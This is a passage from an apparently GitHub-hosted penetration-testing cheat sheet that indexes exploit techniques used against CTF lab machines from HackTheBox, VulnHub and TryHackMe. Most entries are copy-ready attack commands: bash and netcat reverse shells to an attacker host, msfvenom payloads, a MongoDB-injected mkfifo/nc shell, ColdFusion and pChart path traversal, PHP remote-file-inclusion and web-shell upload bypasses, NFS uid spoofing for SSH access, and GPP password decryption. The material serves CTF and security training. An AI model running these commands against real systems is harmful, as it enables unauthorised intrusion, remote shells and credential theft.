command execution vulnerability and gain interactive access on the target system ```shell nc -nlvp <attackerport> bash -i >& /dev/tcp/<attackerip>/<attackerport> 0>&1 ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) | --- <a name="exploit_coldfusion_dirtraversal"></a> #### exploit_coldfusion_dirtraversal [⇡](#exploit) coldfusion 8 is vulnerable to a directory traversal and exposes SHA1 hash of the user password ```shell http://<targetip>:<targetport>/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en ``` [+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560 [+] https://www.exploit-db.com/exploits/14641 --- <a name="exploit_coldfusion_scheduledtasks"></a> #### exploit_coldfusion_scheduledtasks [⇡](#exploit) coldfusion 8 allows to obtain remote shell by creating and executing a new scheduled task. this is a post-authentication vulnerability ```shell http://<targetip>:<targetport>/CFIDE/administrator/enter.cfm http://<targetip>:<targetport>/CFIDE/administrator/settings/mappings.cfm # check the CFIDE logical path mapping to identify the file upload location, C:\ColdFusion8\wwwroot\CFIDE msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f raw >revshell.jsp nc -nlvp <attackerport> http://<targetip>:<targetport>/CFIDE/administrator/scheduler/scheduletasks.cfm # set url to revshell.jsp link # mark the save output to file option # set file to C:\ColdFusion8\wwwroot\CFIDE\revshell.jsp # run the scheduled task on demand to upload the revshell.jsp file http://<targetip>:<targetport>/CFIDE/revshell.jsp ``` [+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560 --- <a name="exploit_command_injection"></a> #### exploit_command_injection [⇡](#exploit) certain webapps couldbe vulebrable to command injection via input text fields ```shell # submit escaped input: "\";whoami\n" ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) | [+] https://muirlandoracle.co.uk/2020/05/30/year-of-the-fox-write-up/ --- <a name="exploit_credsreuse"></a> #### exploit_credsreuse [⇡](#exploit) Reuse credentials already found for a service to interact with another service | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://app.hackthebox.eu/machines/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 2. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 3. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 4. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 5. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="exploit_defaultcreds"></a> #### exploit_defaultcreds [⇡](#exploit) Use default credentials to interact with a service | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Mirai](https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf) | [htb#64](https://app.hackthebox.eu/machines/64) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png" width="100" height="100" /> | [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_drupal_passwordcrack"></a> #### exploit_drupal_passwordcrack [⇡](#exploit) Crack a drupal password hash ```shell hashcat -m 7900 hash.txt /usr/share/wordlists/rockyou.txt -o cracked.txt --force ``` [+] https://0xdf.gitlab.io/2019/03/12/htb-bastard.html --- <a name="exploit_ftp_anonymous"></a> #### exploit_ftp_anonymous [⇡](#exploit) Interact with the ftp service using `anonymous/any` credentials | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://app.hackthebox.eu/machines/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | --- <a name="exploit_ftp_web_root"></a> #### exploit_ftp_web_root [⇡](#exploit) FTP server's root directory is mapped to the web server's root directory. Upload a reverse shell file native to the web server using ftp server (`anonymous` login or default creds or creds reuse or some exploit) and trigger it's execution to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://app.hackthebox.eu/machines/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | --- <a name="exploit_gpp_groupsxml"></a> #### exploit_gpp_groupsxml [⇡](#exploit) the Groups.xml file lists username and encrypted password that can be useful to gain initial access on the target system. access this file via an open ftp/smb share or some other method ```shell smbclient //10.10.10.100/Replication get ..\\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml Groups.xml exit cat Groups.xml gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" smbclient //10.10.10.100/Users -U SVC_TGS ``` [+] https://0xrick.github.io/hack-the-box/active/ [+] https://adsecurity.org/?p=2288 --- <a name="exploit_gymsystem_rce"></a> #### exploit_gymsystem_rce [⇡](#exploit) use `/contacts.php` to confirm the version is 1.0 and fire this exploit to get a pseudo-interactive shell on the target machine. you can ```shell python 48506.py http://<targetip>:<targetport>/ curl "http://<targetip>:<targetport>/upload/kamehameha.php?telepathy=whoami" ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf) | [htb#263](https://app.hackthebox.eu/machines/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) | [+] https://www.exploit-db.com/exploits/48506 --- <a name="exploit_hfs_cmd_exec"></a> #### exploit_hfs_cmd_exec [⇡](#exploit) HFS (`HttpFileServer 2.3.x`) is vulnerable to remote command execution ```shell python 39161.py <targetip> <targetport> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Optimum](https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf) | [htb#6](https://app.hackthebox.eu/machines/6) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png" width="100" height="100" /> | [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) | [+] https://www.exploit-db.com/exploits/39161 [+] https://nvd.nist.gov/vuln/detail/CVE-2014-6287 --- <a name="exploit_iis_asp_reverseshell"></a> #### exploit_iis_asp_reverseshell [⇡](#exploit) use an `asp`|`aspx` reverse shell to gain interactive access on the target system. useful when Microsoft IIS server is found during enumeration. might need a separate vulnerability to upload the reverse shell file on target system (use burp to bypass filename filter - revshell.aspx%00.jpg) ```shell msfvenom -p windows/shell/reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f asp >rs.asp msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f aspx >rs.aspx ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://app.hackthebox.eu/machines/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | [+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#kali-aspx-shells --- <a name="exploit_iis_webdav"></a> #### exploit_iis_webdav [⇡](#exploit) multiple iis webdav issues. can use msf exploits `windows/iis/iis_webdav_scstoragepathfromurl` or `windows/iis/iis_webdav_upload_asp` to gain interactive access on the target system ```shell msfconsole use windows/iis/iis_webdav_scstoragepathfromurl set rhost <targetip> set rport <targetport> show options exploit use windows/iis/iis_webdav_upload_asp set rhost <targetip> set rport <targetport> show options exploit ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Grandpa](https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf) | [htb#13](https://app.hackthebox.eu/machines/13) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070) | | 2. | [Granny](https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf) | [htb#14](https://app.hackthebox.eu/machines/14) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051) | [+] https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_scstoragepathfromurl [+] https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_upload_asp --- <a name="exploit_lotuscms"></a> #### exploit_lotuscms [⇡](#exploit) LotusCMS is vulnerable to remote code execution ```shell nc -nlvp <attackerport> ./lotusRCE.sh <targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100" /> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | [+] https://github.com/Hood3dRob1n/LotusCMS-Exploit/blob/master/lotusRCE.sh --- <a name="exploit_modssl"></a> #### exploit_modssl [⇡](#exploit) Apache `mod_ssl < 2.8.7` is vulnerable to remote code execution ```shell gcc -o 47080 47080.c -lcrypto ./47080 0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2 ./47080 0x6b <targetip> <targetport> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1 (#1)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf) | [vh#22](https://www.vulnhub.com/entry/kioptrix-level-1-1,22/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png" width="100" height="100" /> | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) | [+] https://www.exploit-db.com/exploits/47080 [+] https://nvd.nist.gov/vuln/detail/CVE-2002-0082 --- <a name="exploit_mongodb"></a> #### exploit_mongodb [⇡](#exploit) ```shell nc -nlvp <attackerport> mongo -p -u <user> <record> db.tasks.insert({"cmd": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attackerip> <attackerport> >/tmp/f"}) bye ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | --- <a name="exploit_nfs_rw"></a> #### exploit_nfs_rw [⇡](#exploit) when an open nfs share is found, look for available mountpoints, mount using `nfsv3` so that we can see the real remote `uid` and `gid`, create a new user with expected `uid`, switch user, create the `.ssh` directory, copy `id_rsa.pub` to this directory and ssh to gain interactive access on the target system ```shell check available mountpoints mount file system via nfs v3 check uid of user create a new local user with nfs user's uid change to new user copy ssh public key to .ssh/authorized_keys file ssh into the target as user copy root owned copy of bash from local system to nfs mount running "./bash -p" gives root access as euid is carried over during copy operation mount nfsv3, create new user with nfs user uid and get root shell unmount and remove temporary user: showmount -e <targetip> mkdir /tmp/nfs mount <targetip>:/home/vulnix /tmp/nfs -o vers=3 # nfs v3 allows listing of user ids for shared files ls -l /tmp/nfs # check the uid and use it to create new user useradd -u 2008 vulnix su vulnix copy ~/.ssh/id_rsa.pub to ~/.ssh/authorized_keys on target host to gain passwordless ssh access umount /tmp/nfs ; userdel vulnix showmount -e <targetip> Export list for <targetip>: /home/vulnix * mkdir ./mnt/ mount <targetip>:/home/vulnix ./mnt -o vers=3 ls -l groupadd --gid 2008 vulnix ; useradd --uid 2008 --groups vulnix vulnix cp ~/.ssh/id_rsa.pub ./authorized_keys su vulnix cd ./mnt/ mkdir .ssh/ cp ./authorized_keys ./.ssh/ exit ssh vulnix@<targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | | 2. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | [+] https://blog.christophetd.fr/write-up-vulnix/ --- <a name="exploit_nodejs"></a> #### exploit_nodejs [⇡](#exploit) inspect source for `assets/js/app/controllers/*.js` files and look for rest api calls that could leak sensitive information | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | --- <a name="exploit_nodejs_deserialize"></a> #### exploit_nodejs_deserialize [⇡](#exploit) user input is passed to `unserialize()` method that could allow remote code execution [+] https://dastinia.io/write-up/hackthebox/2018/08/25/hackthebox-celestial-writeup/ [+] https://github.com/hoainam1989/training-application-security/blob/master/shell/node_shell.py [+] https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py [+] https://0xdf.gitlab.io/2018/08/25/htb-celestial.html --- <a name="exploit_pchart"></a> #### exploit_pchart [⇡](#exploit) the `pChart 2.1.3` web application is vulnerable to directory traversal ```shell http://<targetip>/pChart2.1.3/examples/index.php?Action=View&Script=/../../etc/passwd ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100" /> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) | [+] https://www.exploit-db.com/exploits/31173 [+] https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb --- <a name="exploit_pfsense"></a> #### exploit_pfsense [⇡](#exploit) pfsense 2.1.3 is vulnerable to command injection ```shell python3 43560.py --rhost <targetip> --lhost <attackerip> --lport <attackerport> --username foo --password bar ``` [+] https://www.exploit-db.com/exploits/43560 [+] https://medium.com/@ranakhalil101/hack-the-box-sense-writeup-w-o-metasploit-ef064f380190 --- <a name="exploit_php_acs_rfi"></a> #### exploit_php_acs_rfi [⇡](#exploit) Advanced Comment System 1.0 is vulnerable to remote file inclusion and command execution attacks ```shell curl -v "<targetip>/internal/advanced_comment_system/admin.php?ACS_path=php://input%00" -d "<?system('whoami');?>" ``` [+] https://www.exploit-db.com/exploits/9623 --- <a name="exploit_php_fileupload"></a> #### exploit_php_fileupload [⇡](#exploit) certain poorly developed php web applications allow unrestricted file uploads that can be abused to gain interactive access on the target system ```shell cp /usr/share/webshells/php/php-reverse-shell.php ./rs.php subl rs.php # point to <attackerip> and <attackerport> nc -nlvp <attackerport> # upload rs.php and trigger execution ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 2. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | | 3. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | --- <a name="exploit_php_fileupload_bypass"></a> #### exploit_php_fileupload_bypass [⇡](#exploit) add gif file magicbytes `GIF891` to a php reverse shell file, rename it to rs.php.gif and upload to bypass upload filter. sometimes, a restrictve waf might still stop file upload. in that case, use a minimal command execution php file with gif magicbytes instead of a full php reverse shell ```shell cp /usr/share/webshells/php/php-reverse-shell.php ./rs.php.gif subl rs.php.gif # point to <attackerip> and <attackerport> AND add GIF89a to the start of file nc -nlvp <attackerport> # upload rs.php.gif and trigger execution ### echo -e 'GIF89a\n<?php $out=$_GET["cmd"]; echo `$out`; ?>' >cmd.gif # upload and execute commands ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [IMF: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf) | [vh#162](https://www.vulnhub.com/entry/imf-1,162/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof) | | 2. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | --- <a name="exploit_php_reverseshell"></a> #### exploit_php_reverseshell [⇡](#exploit) use php reverse shell code with an exploit to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 2. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100" /> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 3. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 4. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), 